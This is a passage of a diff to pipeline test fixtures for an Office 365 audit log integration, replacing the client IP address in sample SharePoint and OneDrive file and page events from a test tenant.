@@ -385,12 +313,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.521170300Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:45.953101800Z", + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePoint", "provider": "OneDrive", "kind": "event", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json index 4d4cc44c86c..0e31ff8b060 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json 
@@ -2,10 +2,10 @@ "events": [ { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 
11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "CreationTime": "2020-02-07T16:44:07", "EventSource": "SharePoint", 
@@ -33,10 +33,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 
11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "CreationTime": "2020-02-07T16:44:07", "EventSource": "SharePoint", 
@@ -64,10 +64,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"652b339f-90a0-a000-f25f-919afc141eb1\",\"CreationTime\":\"2020-02-07T16:44:08\",\"EventSource\":\"SharePoint\",\"Id\":\"25b08f04-48ee-4755-ce22-08d7abecf3a9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"ff3631c1-6189-45c7-ad45-c15cea9e9255\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx\",\"Operation\":\"FileAccessed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"aspx\",\"SourceFileName\":\"All.aspx\",\"SourceRelativeUrl\":\"Documents/Forms\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": 
"{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-90a0-a000-f25f-919afc141eb1\",\"CreationTime\":\"2020-02-07T16:44:08\",\"EventSource\":\"SharePoint\",\"Id\":\"25b08f04-48ee-4755-ce22-08d7abecf3a9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"ff3631c1-6189-45c7-ad45-c15cea9e9255\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx\",\"Operation\":\"FileAccessed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"aspx\",\"SourceFileName\":\"All.aspx\",\"SourceRelativeUrl\":\"Documents/Forms\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "652b339f-90a0-a000-f25f-919afc141eb1", "CreationTime": "2020-02-07T16:44:08", "EventSource": "SharePoint", 
@@ -95,10 +95,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"652b339f-90a0-a000-f25f-919afc141eb1\",\"CreationTime\":\"2020-02-07T16:44:08\",\"EventSource\":\"SharePoint\",\"Id\":\"25b08f04-48ee-4755-ce22-08d7abecf3a9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"ff3631c1-6189-45c7-ad45-c15cea9e9255\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx\",\"Operation\":\"FileAccessed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"aspx\",\"SourceFileName\":\"All.aspx\",\"SourceRelativeUrl\":\"Documents/Forms\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": 
"{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-90a0-a000-f25f-919afc141eb1\",\"CreationTime\":\"2020-02-07T16:44:08\",\"EventSource\":\"SharePoint\",\"Id\":\"25b08f04-48ee-4755-ce22-08d7abecf3a9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"ff3631c1-6189-45c7-ad45-c15cea9e9255\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx\",\"Operation\":\"FileAccessed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"aspx\",\"SourceFileName\":\"All.aspx\",\"SourceRelativeUrl\":\"Documents/Forms\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "652b339f-90a0-a000-f25f-919afc141eb1", "CreationTime": "2020-02-07T16:44:08", "EventSource": "SharePoint", 
@@ -126,10 +126,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-c016-a000-f25f-990a07b2e011\",\"CreationTime\":\"2020-02-07T16:44:21\",\"EventSource\":\"SharePoint\",\"Id\":\"dac93a9f-f2fb-4cac-d18f-08d7abecfbb6\",\"ImplicitShare\":\"No\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileUploaded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": 
"{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-c016-a000-f25f-990a07b2e011\",\"CreationTime\":\"2020-02-07T16:44:21\",\"EventSource\":\"SharePoint\",\"Id\":\"dac93a9f-f2fb-4cac-d18f-08d7abecfbb6\",\"ImplicitShare\":\"No\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileUploaded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "692b339f-c016-a000-f25f-990a07b2e011", "CreationTime": "2020-02-07T16:44:21", "EventSource": "SharePoint", 
@@ -158,10 +158,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": 
"{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "CreationTime": "2020-02-07T16:44:23", "EventSource": "SharePoint", 
@@ -189,10 +189,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 
11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "652b339f-908c-a000-f25f-91423da7dd9b", "CreationTime": "2020-02-07T16:44:07", "EventSource": "SharePoint", 
@@ -220,10 +220,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-c016-a000-f25f-990a07b2e011\",\"CreationTime\":\"2020-02-07T16:44:21\",\"EventSource\":\"SharePoint\",\"Id\":\"dac93a9f-f2fb-4cac-d18f-08d7abecfbb6\",\"ImplicitShare\":\"No\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileUploaded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": 
"{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-c016-a000-f25f-990a07b2e011\",\"CreationTime\":\"2020-02-07T16:44:21\",\"EventSource\":\"SharePoint\",\"Id\":\"dac93a9f-f2fb-4cac-d18f-08d7abecfbb6\",\"ImplicitShare\":\"No\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileUploaded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "692b339f-c016-a000-f25f-990a07b2e011", "CreationTime": "2020-02-07T16:44:21", "EventSource": "SharePoint", 
@@ -252,10 +252,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 